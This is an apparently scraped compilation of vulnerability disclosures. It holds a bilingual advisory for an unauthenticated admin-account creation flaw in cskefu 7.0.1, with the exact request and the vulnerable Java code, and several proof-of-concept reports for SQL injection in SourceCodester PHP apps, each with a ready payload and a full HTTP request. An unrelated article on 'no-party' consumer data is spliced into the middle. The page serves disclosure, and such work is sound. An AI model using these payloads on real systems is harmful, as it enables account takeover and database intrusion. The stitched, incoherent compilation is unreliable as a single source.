Insecure permissions in cskefu v7.0.1 allows unauthenticated attackers to arbitrarily add administrator accounts.

**概述**

存在添加管理员接口，调用该接口时没有对当前用户进行校验，导致未登录状态下可添加管理员账户。  
There is an interface to add an administrator. When calling this interface, the current user is not verified, so that an administrator account can be added when not logged in.

**数据包（payload）：**

GET /addAdmin?username\=admin666&password\=admin666123&email\=admin666@admin6666.com&mobile\=17777777776&superadmin\=true HTTP/1.1
Host: localhost
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: none
Sec\-Fetch\-User: ?1
Cache\-Control: max\-age\=0

\*\* 测试截图（Test screenshot）： \*\*  

根据给出的URL  
According to the given URL  
http://localhost/?schema=http&port=80&hostname=localhost&subtype=user&maintype=apps&typename=methodName&orgi=cskefu&webimport=8036&sessionid=f8dbdd6d51dd44788ccad36c02e7958b&models=cca&models=chatbot&models=report&models=entim&models=contacts&ip=172.18.0.1&userExpTelemetry=on

跳转至管理界面  
Jump to the management interface  

**漏洞分析（Vulnerability analysis）**  
漏洞源码（Vulnerability source code）：

 @RequestMapping("/addAdmin")
    @Menu(type = "apps", subtype = "user", access = true)
    public ModelAndView addAdmin(HttpServletRequest request, HttpServletResponse response, @Valid User user) {
        String msg = "";
        msg = validUser(user);
        if (StringUtils.isNotBlank(msg)) {
            return request(super.createView("redirect:/register.html?msg=" + msg));
        } else {
            user.setUname(user.getUsername());
            user.setAdmin(true);
            if (StringUtils.isNotBlank(user.getPassword())) {
                user.setPassword(MainUtils.md5(user.getPassword()));
            }
            user.setOrgi(super.getOrgi());
            userRepository.save(user);
        }
        ModelAndView view = this.processLogin(request, user, "");
        return view;
    }

    private String validUser(User user) {
        String msg = "";
        User tempUser = userRepository.findByUsernameAndDatastatus(user.getUsername(), false);
        if (tempUser != null) {
            msg = "username\_exist";
            return msg;
        }
        tempUser = userRepository.findByEmailAndDatastatus(user.getEmail(), false);
        if (tempUser != null) {
            msg = "email\_exist";
            return msg;
        }
        tempUser = userRepository.findByMobileAndDatastatus(user.getMobile(), false);
        if (tempUser != null) {
            msg = "mobile\_exist";
            return msg;
        }
        return msg;
    }

addAdmin接口未进行权限校验，未登录状态可直接调用  
The addadmin interface does not perform permission verification, and can be called directly in the unregistered state

增加用户前，判断传入的用户是否有效  
Before adding users, judge whether the incoming users are valid  

为了顺利到达最后一个return，传入的username，email，mobile都必须为数据库中的唯一值  
n order to successfully reach the last return, the username, email and mobile passed in must be unique values in the database  

当返回的msg为空时，我们就可以继续增加用户的操作，且将添加的用户设置为管理员  
When the returned MSG is empty, we can continue to add users and set the added users as administrators  

**操作系统**

*   macOS or Mac OSX
*   Windows
*   Linux(Debian, CentOS, Ubuntu, etc.)

**代码版本**

代码版本 <= 7.0.1

**祝福与不祝福**

春松客服之所以开源，是基于这样一种信念：爱人也是爱己，利他也是利己。  
对人和人美好关系的向往，对人潜力的信任。让我们相信因春松客服而受益的人，会回报给春松客服开源社区，我们所有贡献者基于共赢的信念合作。  
回报方式包括：提交 PR、购买春松客服相关的付费产品和服务等。

因春松客服受益，而不回报开源社区的用户，我们不欢迎使用春松客服：我们开源并不是为了你们，你们是不被祝福的。

**Open Source for the World**

CVE-2022-36521: 【安全漏洞】前台未授权增加管理员账号 · Issue #724 · chatopera/cskefu

Consumers gain control of their data while companies build better relationships with their customers — but third-party ad-tech firms will likely continue to stand in the way.

For more than two decades, the economic advantages of third-party firms' collection of information on consumers stymied technologists' dreams of giving people more control over their data and inhibiting the collection of personal information.

Now, faced with increasing privacy regulations and penalties, public agencies and private-sector businesses are leaning into the concept of "no-party data" — information shared by the consumer directly with a company with which they have a relationship that can still be used to personalize their experience. As a result, technology firms and academic researchers are developing data architectures to support no-party data technologies while giving control — and more data security — to the consumer.

Sometimes called "zero-party data," the no-party data movement has gained traction because of the consumer pushback against third-party advertising-technology firms, which often collect data against the consumer's wishes, says Ant Phillips, chief technology officer for Celebrus, which announced its no-party solution earlier this month.

"Third-party data collection and data sharing is not something that consumers ever signed up for — they did not wake up and say, 'I want to share my data with lots of companies,'" he says. "The business case \[for no-party data\] is around brands wanting to do the right thing for consumers because most consumers do not have a problem trusting certain brands, but they don't want to spread their data all around the Internet."

**The Struggle Is Real**

Giving consumers control over what information is collected about them has been a long struggle. In the late 1990s, pro-privacy firm Zero Knowledge Systems attempted to create a certificate-based system that could attest to certain consumer attributes — such as being an adult — without the need for personal identification. In 2008, Microsoft pursued the technology in its U-Prove system, after acquiring the company Credentica, which was founded by Stefan Brands, a former ZKS cryptographer.

For the most part, those technologies could not compete with the business success of ad-tech firms using third-party cookies.

The result is that privacy-conscious consumers actively fight against cookie tracking, and policymakers and browser developers have followed suit. In 2017, Apple announced its Intelligent Tracking Prevention, which would block tracking through third-party cookies, much to the consternation of advertisers. Since 2018, the European Union has required advertisers to get users' consent to use third-party cookies. And in 2019, Mozilla announced that its Firefox browser would block third-party cookies; Google followed suit, pledging to phase out third-party cookies in 2023. Facing low opt-in rates, companies have resorted to the deceptive design of the dialog boxes that ask users to consent to using their data.

With significant resistance to data collection, companies have focused on engaging with consumers. No-party data — which analyst firm Forrester Research calls "zero-party data" — is information collected directly from the consumer. It is typically collected through preference settings or micro-experiences, where a product maker or service provider will directly ask a consumer about their habits.

Zero-party data is the future, says Stephanie Liu, an analyst with Forrester Research.

"​The principles of zero-party data are going to be the foundation of data collection moving forward: transparent, consented, and provides value back to the consumer," she says. "Brands are historically terrible at asking consumers for data. ... But as consumer data gets harder to acquire, companies need to invest in the strategy and tech of what they're going to ask of consumers, how, and what benefit they'll deliver in return."

**'Creepy' Targeted Advertising**

The battle between advertising firms and privacy advocates often centers around tracking of citizens across websites. While tracking people through their real life is usually prohibited, large online ad-tech firms are able to effectively stalk consumers across the Internet. Currently, more than 80% of US citizens believe they lack control of the data collected about them by companies and the government, and they believe that businesses collecting data poses risks that outweigh the benefits, according to a survey by the Pew Research Center.

A significant part of the problem is that, despite the data collection, advertising either seems to miss the target or is so accurate that it's borderline creepy. In addition, ad-tech firms often catch behavior that has nothing to do with consumer buying intentions or habits, and they often use information in ways consumers would not approve. Policymakers have recognized the unintentional privacy costs of the third-party data market, passing regulations such as the General Data Protection Regulation (GDPR) in Europe and the California Consumer Protection Act (CCPA) and similar legislation in the United States.

For all these reasons, the third-party data model is broken, argues Celebrus' Philips. Consumers do not want to be tracked, and the slight benefit of ad-tech firms' capability to tailor marketing is greatly outweighed by the privacy risks posed by the technology and the fact that advertising firms' predictions of consumers' interests are often not accurate.

"From an economics view, the whole model is wasted capital — it's an economic waste," he says. "One misplaced ad is not going to break the bank, but in aggregate it is inefficient."

With no-party data, the consumer offers up information about themselves. Yet they still want to retain control of the data. Otherwise, they have no guarantee that the third-party companies will not use that data in ways that were not intended.

Technology firms have started offering solutions to allow personalization while giving the consumer control of their data. Celebrus' system, for example, stores information in local storage, allowing the consumer to retain control, and does all personalization and processing on the user's machine. On its face, the technology resembles Solid, a project created in a collaboration between Web progenitor Tim Berners-Lee and the Massachusetts Institute of Technology, which allows users to create virtual data "pods" on their systems that they can give trusted companies access to in a granular way, says John Bruce, co-founder and CEO of Inrupt, which is commercializing the technology.

"Solid allows people to make themselves known to providers without losing control of data," he says. "Businesses are truly beginning to understand that they can better service the customer if they retain their trust and allow them to keep control of their data."

**Consumers Want Personalization**

Ad-tech firms will not go away, but they will likely have less access to consumer data. Delivering personalization to consumers while at the same time limiting the collection of data will be the future, according to analyst firm McKinsey & Co., which found that 71% of consumers expect a personalized experience. Companies that excel at delivering that experience typically see 40% more profits on those services, the firm found.

The result will be that advertising will be less targeted but closer to what consumers want and with less of what we have today — annoying, creepy, and harmful uses of data, says Forrester's Liu.

"\[I\]t's not just the shoes you already purchased that still follow you across the Internet, but \[advertisements targeting\] those who've lost their pregnancies and can't opt out of baby ads," Liu says. "A big part of why we're here — with Apple releasing new privacy features, a quickly evolving privacy regulatory landscape, and rising consumer awareness — is because we've creeped out consumers, and they are fed up."

'No-Party' Data Architectures Promise More Control, Better Security

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_category.

Permalink

Cannot retrieve contributors at this time

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/classes/Master.php?f=delete\_category

Vulnerability location: /tss/classes/Master.php?f=delete\_category, id

db\_name = tss\_db;length=6

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /tss/classes/Master.php?f\=delete\_category HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36678: bug_report/SQLi-2.md at main · k0xx11/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=user/manage_user.

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/admin/?page=user/manage\_user&id=

Vulnerability location: /tss/admin/?page=user/manage\_user&id=, id

db\_name = tss\_db;length=6

\[+\] Payload: /tss/admin/?page=user/manage\_user&id=-7%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11--+ // Leak place ---> id

GET /tss/admin/?page\=user/manage\_user&id\=\-7%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close

CVE-2022-36679: bug_report/SQLi-1.md at main · k0xx11/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_student.

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/classes/Master.php?f=delete\_student

Vulnerability location: /tss/classes/Master.php?f=delete\_student, id

You need to first create the library by executing the following sql statement in the database tss\_db

CREATE TABLE \`student\_list\` ( 
  \`id\` int(30) NOT NULL,
  \`user\_id\` int(30) NOT NULL,
  \`name\` text NOT NULL,
  \`status\` tinyint(1) NOT NULL DEFAULT '1',
  \`delete\_flag\` tinyint(1) NOT NULL DEFAULT '0',
  \`date\_created\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP,
  \`date\_updated\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP ON UPDATE CURRENT\_TIMESTAMP
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;

db\_name = tss\_db;length=6

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /tss/classes/Master.php?f\=delete\_student HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36682: bug_report/SQLi-4.md at main · k0xx11/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_account.

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/classes/Master.php?f=delete\_account

Vulnerability location: /tss/classes/Master.php?f=delete\_account, id

You need to first create the library by executing the following sql statement in the database tss\_db

CREATE TABLE \`accounts\` ( 
  \`id\` int(30) NOT NULL,
  \`user\_id\` int(30) NOT NULL,
  \`name\` text NOT NULL,
  \`status\` tinyint(1) NOT NULL DEFAULT '1',
  \`delete\_flag\` tinyint(1) NOT NULL DEFAULT '0',
  \`date\_created\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP,
  \`date\_updated\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP ON UPDATE CURRENT\_TIMESTAMP
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;

db\_name = tss\_db;length=6

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /tss/classes/Master.php?f\=delete\_account HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36681: bug_report/SQLi-5.md at main · k0xx11/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_payment.

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/classes/Master.php?f=delete\_payment

Vulnerability location: /tss/classes/Master.php?f=delete\_payment, id

You need to first create the library by executing the following sql statement in the database tss\_db

CREATE TABLE \`payment\_list\` ( 
  \`id\` int(30) NOT NULL,
  \`user\_id\` int(30) NOT NULL,
  \`name\` text NOT NULL,
  \`status\` tinyint(1) NOT NULL DEFAULT '1',
  \`delete\_flag\` tinyint(1) NOT NULL DEFAULT '0',
  \`date\_created\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP,
  \`date\_updated\` datetime NOT NULL DEFAULT CURRENT\_TIMESTAMP ON UPDATE CURRENT\_TIMESTAMP
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;

db\_name = tss\_db;length=6

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /tss/classes/Master.php?f\=delete\_payment HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36683: bug_report/SQLi-6.md at main · k0xx11/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_schedule.

Permalink

Cannot retrieve contributors at this time

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/classes/Master.php?f=delete\_schedule

Vulnerability location: /tss/classes/Master.php?f=delete\_schedule, id

db\_name = tss\_db;length=6

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /tss/classes/Master.php?f\=delete\_schedule HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36680: bug_report/SQLi-3.md at main · k0xx11/bug_report

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_waste.

Permalink

Cannot retrieve contributors at this time

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/classes/Master.php?f=delete\_waste

Vulnerability location: /isms/classes/Master.php?f=delete\_waste, id

db\_name = isms\_db;

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /isms/classes/Master.php?f\=delete\_waste HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36697: vul-wiki/SQLi-9.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_stockout.

Permalink

Cannot retrieve contributors at this time

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/classes/Master.php?f=delete\_stockout

Vulnerability location: /isms/classes/Master.php?f=delete\_stockout, id

db\_name = isms\_db;

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /isms/classes/Master.php?f\=delete\_stockout HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

Tag

#firefox